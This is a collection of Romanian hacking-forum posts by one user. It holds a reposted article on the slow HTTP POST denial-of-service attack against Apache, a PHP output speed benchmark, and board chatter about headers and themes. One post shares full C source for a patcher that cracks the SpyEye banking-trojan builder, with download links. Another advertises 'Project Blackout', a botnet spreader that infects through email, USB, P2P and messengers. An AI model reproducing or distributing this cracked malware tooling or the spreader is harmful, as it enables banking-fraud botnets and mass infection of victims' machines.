Nytro

HTTP Post Denial Of Service: more dangerous than initially thought by Bogdan Calin on November 22, 2010 – 8:47 pm Wong Onn Chee and Tom Brennan from OWASP recently published a paper* presenting a new denial of service attack against web servers. What’s special about this denial of service attack is that it’s very hard to fix because it relies on a generic problem in the way HTTP protocol works. Therefore, to properly fix it would mean to break the protocol, and that’s certainly not desirable. The authors are listing some possible workarounds but in my opinion none of them really fixes the problem. The attack explained An attacker establishes a number of connections with the web servers. Each one of these connections contains a Content-Length header with a large number (e.g. Content-Length: 10000000). Therefore, the web server will expect 10000000 bytes from each one of these connections. The trick is not to send all this data at once but to send it character by character over a long period of time (e.g. 1 character each 10-100 seconds). The web server will keep these connections open for a very long time, until it receives all the data. In this time, other clients will have a hard time connecting to the server, or even worse will not be able to connect at all because all the available connections are taken/busy. In this blog post, I would like to expand on the effect of this denial of service attack against Apache. First, I would like to start with one of their affirmations: “Hence, any website which has forms, i.e. accepts HTTP POST requests, is susceptible to such attacks.” At least in the case of Apache, this is not correct. It doesn’t matter if the website has forms or not. Any Apache web server is vulnerable to this attack. The web server doesn’t decide if the resource can accept POST data before receiving the full request. I’ve created a very simple Acunetix WVS test script to reproduce this attack and prove this point: The script will create 256 sockets, establish a TCP connection to the web server on each socket and start sending data slowly (1 character per second). Screenshot: http://www.acunetix.com/blog/wp-content/uploads/2010/11/wvs-scripting1.png As you can see in the code from the screen-shot, I’m making a HTTP POST request to an nonexistent file (POST /aaaaaaaaaaaa HTTP/1.1). After a few seconds, the web server becomes completely unresponsive. As soon as I stop the script, the web server starts responding again. Therefore, any Apache web server is vulnerable to this attack. How many connections are required until the web server stops responding? Their paper mentions 20.000 connections as an example. They also make the following note: Apache requires lesser number of connections due to mandatory client or thread limit in httpd.conf. Interesting. How much lesser number of connections? If we look in the Apache 1.3 documentation, we find the following information: The MaxClients directive sets the limit on the number of simultaneous requests that can be supported; not more than this number of child server processes will be created. Syntax: MaxClients number Default: MaxClients 256 Therefore, by default Apache 1.3 only allows 256 connections. Therefore, an attacker only needs to steal 256 connections before the web server stops responding. It’s the same situation even with Apache 2.0. During my tests, I noticed the following error message in the Apache error log: $tail -f /var/log/apache2/error.log [Mon Nov 22 15:23:17 2010] [notice] Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g configured — resuming normal operations [Mon Nov 22 15:24:46 2010] [error] server reached MaxClients setting, consider raising the MaxClients setting In conclusion, the denial of service attack affects any Apache web server and one requires only a few hundred connections to make the server completely unresponsive. And based on my knowledge there is no proper fix for it: Apache response was: “What you described is a known attribute (read: flaw) of the HTTP protocol over TCP/IP. The Apache HTTP project declines to treat this expected use-case as a vulnerability in the software.” And Microsoft’s response: “While we recognize this is an issue, this issue does not meet our bar for the release of a security update. We will continue to track this issue and the changes I mentioned above for release in a future service pack.” That’s pretty scary! * The paper published by Wong Onn Chee and Tom Brennan can be found here: http://www.owasp.org/images/4/43/Layer_7_DDOS.pdf Sursa: HTTP Post Denial Of Service: more dangerous than initially thought | Acunetix Web Application Security Blog

AndrusKanu: Nu mai punem header de sarbatori, doar il schimbam pe cel vechi. Legat de citat, nu ma intereseaza cat de "smechere" sunt cat timp nu au legatura cu RST. Asa punem simplu: "A fi sau a nu fi, aceasta e intrebarea". Ideea e sa se muleze perfect pe contextul de fata, pe activitatea noastra. Adica nu se potriveste orice citat care e doar legat de un calculator, sau cine stie ce citat generic care pentru noi nu inseamna nimic.

Veniti cu mai multe idei pentru "texte", apoi supunem la vot.

In primul rand warn. In al doilea rand, daca citeai ultimul rand vedeai de unde am copiat informatiile.

PHP Output and Concatenation Speed Comparison Cateva teste simple si utile pentru cei mai "optimizationisti" dintre noi. There are a few commonly asked PHP questions: What is the difference between the print and echo constructs? What is the difference between single and double quotes? These questions are both answered very sufficiently by doing a quick search on Google. However, one thing often overlooked is the speed comparison between print, echo and single and double quotes. So, I thought I would do a bit of a test… Setting up my test After reading Adam Wright’s response to this question on Stack Overflow, I thought it was a great starting point and had some great potential to expand. The basics of my test will be based on the following code: <?php function timefunc($function, $runs) { $times = array(); for ($i = 0; $i < $runs; $i++) { ob_start(); $time = microtime(); call_user_func($function); $times[$i] = microtime() - $time; ob_end_clean(); } return array_sum($times) / $runs; } ?> It is almost the same as Adam’s, however I have introduced an output buffer so I am able to easily test my output speeds. My output will be an average speed for the function that has been run. To make my test fair, each of my functions to test are going to be based on the following code: function test1() { $foo = 'some words'; for ($i = 0; $i < 10000; $i++) $t = "these are some words"; //Test in here } For a fair comparison, I am always going to declare the $foo variable even if it is not used in the test, this means the only thing that changes with each test will be my test line. What is quicker – Single or Double quotes? The first test I am going to carry out is the difference between single and double quotes when inserting variables into a string. My variable is to insert will be “some words”, with my starting string being “these are “. I am going to carry out the following tests: <?php /* Simple starting references */ $t = "these are some words"; //Double quotes $t = 'these are some words'; //Single quotes /* Tests */ $t = "these are $foo"; //Double quotes $t = "these are {$foo}"; //Double quotes with brackets $t = "these are " . $foo; //Double quotes with concatenation $t = 'these are ' . $foo; //Single quotes with concatenation ?> As you should know, single quotes doesn’t allow parsing of variables straight into the string, and therefore I have only included it here with concatenation as that is the only way to get the variable into the output. The results are: Double quotes 0.0023348 Single quotes 0.0024924 Double quotes 0.0039244 Double quotes with brackets 0.0040088 Double quotes with concatenation 0.0027065 Single quotes with concatenation 0.0026829 Very, very interesting! From this, you can see that using concatenation with either double or single quotes, the speed decrease is only ~16%. There is also negligible difference between single and double quotes both in the reference test and also in concatenation, I would put the small differences in the test down to noise during my testing. I think the interesting thing found here is that placing the variable directly into double quotes causes a speed decrease of ~68%, again I would put the difference between bracketed and non–bracketed down to noise during my tests as it is a tiny difference. What is quicker – echo or print? Now, what is the quickest way to output information in PHP. It is commonly known that print and echo are used to output data. There are however, two other ways to output data directly to the output data stream, the output and stdout data streams. To output to these, you can use PHP’s normal file handling functions as they deal directly with streams. Firstly, I will run some simple output tests: <?php /* The tests */ echo "these are some words"; //Echo with double quotes echo 'these are some words'; //Echo with single quotes print "these are some words"; //Print with double quotes print 'these are some words'; //Print with single quotes file_put_contents("php://output", 'these are some words'); //Output stream file_put_contents("php://stdout", 'these are some words'); //Stdout stream ?> The results: Echo with double quotes 0.0020305 Echo with single quotes 0.001976 Print with double quotes 0.0021426 Print with single quotes 0.0021427 Output stream 0.0206471 Stdout stream 0.0518192 This time, I think the finding are even more interesting. As expected, print is slower than echo by ~6%. Also, writing straight to the output stream causes quite a large decrease in speed. This is probably caused by the fact we are having to use the file_put_contents function to write the output and not a built in constructor. I think very interesting is the fact that writing to stdout is ~150% slower than writing to the output stream. Let’s put them together – output and concatenation comparison Now we have seen the speed differences between outputs and concatenations, now let’s put them together and see what happens. Here are the tests: <?php /* Tests */ echo "these are $foo"; //Echo double echo "these are {$foo}"; //Echo double with brackets echo "these are " . $foo; //Echo double with concatenation echo 'these are ' . $foo; //Echo single with concatenation print "these are $foo"; //Print double print "these are {$foo}"; //Print double with brackets print "these are " . $foo; //Print double with concatenation print 'these are ' . $foo; //Print single with concatenation printf('these are %s', $foo); //Printf ?> Most of these should make perfect sense, the only addition I have made is the printf function. This allows a string replace functionality that outputs it’s result. Quite simply in the format above, it provides the same functionality as all the other tests. So, here are the results: Output Tests With Concatenation Echo with double quotes 0.0043563 Echo with double quotes (brackets) 0.0043074 Echo with double quotes (concatenation) 0.0032709 Echo with single quotes (concatenation) 0.0032543 Print with double quotes 0.0045534 Print with double quotes (brackets) 0.0057546 Print with double quotes (concatenation) 0.0034584 Print with single quotes (concatenation) 0.0036391 Printf 0.0110374 Nothing amazing here really, everything has already been explained previously. Probably the only thing to note is that the printf function takes ~92% longer than the next longest output (print with double quotes & brackets). So, I think this proves that the concatenation operator (.) in php provides the quickest way for placing variables into a string. It also, doesn’t seem to make much difference whether you use single or double quotes throughout your scripts. The important thing to note from these test I think, is that the output functions take a significant amount of time longer to run that the output constructs build into PHP. If you can think of any output methods I have forgotten, let me know in the comment. If you have found this post interesting, please read through some of my other posts and subscribe to my RSS feed. Thanks for reading! Sursa si articolul frumos aranjat: PHP Output and Concatenation Speed Comparison – Murray Picton

SpyEye.1.1.39.Builder+Patch Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Nici nu stiu daca mai e postat. 1.Start SpyEye.exe 2.Start SpyEyePatch.exe - Klick OK 3.Klick Ok in SpyEye error message and enjoy the Builder Download: http://www.multiupload.com/ZEAYSEAU4W SpyEyePatch SourceCode: #include <Windows.h> #include <tlhelp32.h> typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle ); typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle ); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { TOKEN_PRIVILEGES priv; HANDLE hThis, hToken; LUID luid; hThis = GetCurrentProcess(); OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken); LookupPrivilegeValue(0, "seDebugPrivilege", &luid); priv.PrivilegeCount = 1; priv.Privileges[0].Luid = luid; priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0); CloseHandle(hToken); CloseHandle(hThis); HANDLE ProcessHandle = 0; _NtSuspendProcess NtSuspendProcess = 0; _NtResumeProcess NtResumeProcess = 0; PROCESSENTRY32 processInfo; processInfo.dwSize = sizeof(processInfo); HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); CHAR processName[] = "SpyEye.exe"; DWORD PID = 0 ; DWORD Patch1 = 0x4010C5; DWORD Patch2 = 0x4010CA; DWORD Patch3 = 0x4010CC; DWORD Patch4 = 0x4010CD; UCHAR PatchVal1[] = "\xB8\x0C\x11\x40\x00"; UCHAR PatchVal2[] = "\xFF\xD0"; UCHAR PatchVal3[] = "\x90"; UCHAR PatchVal4[] = "\x90"; NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" ); NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" ); if ( processesSnapshot == INVALID_HANDLE_VALUE ){ return 0; } Process32First(processesSnapshot, &processInfo); while ( Process32Next(processesSnapshot, &processInfo)){ if ( !strcmp(processName,processInfo.szExeFile)){ CloseHandle(processesSnapshot); PID = processInfo.th32ProcessID; break; } } if(PID != NULL){ //MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0); ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID); } if ( ProcessHandle != NULL ){ NtSuspendProcess( ProcessHandle ); WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL); /* 004010C5 B8 0C114000 MOV EAX,SpyEye.0040110C 004010CA FFD0 CALL EAX 004010CC 90 NOP 004010CD 90 NOP */ MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0); NtResumeProcess( ProcessHandle ); CloseHandle(ProcessHandle); } return 0; } Sursa: SpyEye.1.1.39.Builder+Pat ch - r00tsecurity

Project Blackout V2.5 - Amazing Auto-Spreader Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Project Blackout V2.5 is made to spread your botnet, but it works on every .exe on the internet! Yes, this means: Keyloggers, RATS, Crypted files and much,much, more! Automatically Download and Execute your bot on run Mass Email Spread (This is why gmail username and password is required) Infect all HTML documents Antis MSN Spread *Sends message to all online contacts getting them to download and run your virus* LAN Spread *This one is seriously amazing* P2P Spread - Limewire, eDonkey and much, much more *Amazing, just plain amazing. When you have over 100+ bots all hosting your virus on limewire you will be getting a fuckload of zombies* Skype spread *Send message to all online contacts getting them to download your virus* USB Spread *Its your basic, everyday, 100% working and stable USB auto-sperad* Unique mutex. *This way your bot is unique, and other bots do not copy over yours* Download: http://uppit.com/v/ilj6tmmv

Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator pentru nimic. Cred ca a mai fost postat, dar nu cred ca mai era bun link-ul de download. Download: http://www.mediafire.com/?qvpj2us7oxg38cf Sau: http://www.multiupload.com/3D4WKJL6JW

Trebuie sa reactioneze "cei mari". Noi nu prea avem ce face, putem doar sa asteptam. Producatorii de routere, gateway-uri, switch-uri si alte echipamente, cat si ISP-urile si organizatiile care se ocupa cu standardele ar trebui sa ia atitudine si asta cat mai repede. Da, dupa parerea mea pe 12.12.2012 se vor termina adresele IPv4, deci chiar va veni sfarsitul lumii.

Curiosity is our motivation, security is our hobby/job and information si our weapon. Sau cam asa ceva.

De "IT" iti recomand "Fortareata Digitala" de Dan Brown.

Si cum ai "interactionat" din Windows cu exploitul? Cu acel Share sau cu Internet Explorer?

Da, mie imi plac toate headerele, nu sunt foarte pretentios, dar sa gasim textul potrivit. Faceti o lista cu texte mai "stralucite" si supunem la vot.

Hmm, poate ceva de genul: "Accesul la informatie e un drept, sustinem libertatea la informatie." "Information is a right, we support this right".

Nu asa, pack. Am mai stat o zi intreaga sa tot pun teme pe localhost sa vad care ar fi mai stralucite si erau numai porcarii. Alegeti cateva teme, mai reusite, mai intunecate, nu stiu, care sa dea bine.

O intrebare simpla: de ce? PS: Daca gasiti tema X360, parca asa se cheama, ceva asemanator cu tema curenta, ne mai gandim.

Da, trebuie un alt text, momentan nu prea am idei, veniti si voi cu una.

Salut. Deocamdata nu stiu cine esti, dar schimbatul username-urilor poate provoca multa confuzie in randul celorlalti utilizatori. Dar uneori mai schimb cate un username, doar la cei cu putine posturi.

E aiurea chestia cu "mata-i grasa"... Intre timp ganditi-va la un text mai potrivit, in loc de "we don't care...".

De la cel animat parca ma dor ochii, dar celalalte doua imi plac. Sa vad ce zic si ceilalti.

Mie imi place, dar sa fie altceva in dreapta, sau sa nu fie deloc. Si acele texte: shellcode, ASM-ul... Sa fie aranjate altfel, nu stiu, sa se cuprinda mai bine in peisaj.

Inj3ctor aveau o copie dupa milw0rm. Cat despre Happy Ninjas, tocmai asta e ideea, nu trebuie sa stie nimeni cine sunt, sunt "underground".

Da ma, asta voiam sa zic, ei doar se lauda cu lucruri facute de altii. De asta sunt niste ratati.

Defcon 2010 - Who cares about IPv6 Sam Bowne Tocmai l-am vazut, mi s-a parut interesant si prezinta cateva lucruri care ar trebui sa ne intereseze pe toti, lucruri bine de stiut. Durata: 26:57 Youtube: http://www.youtube.com/watch?v=zIUgH2wVt_0

Nu stiu, probabil destul de mult, sunt multe articole intregi postate pe forum. Nu membrii ocupa mult spatiu.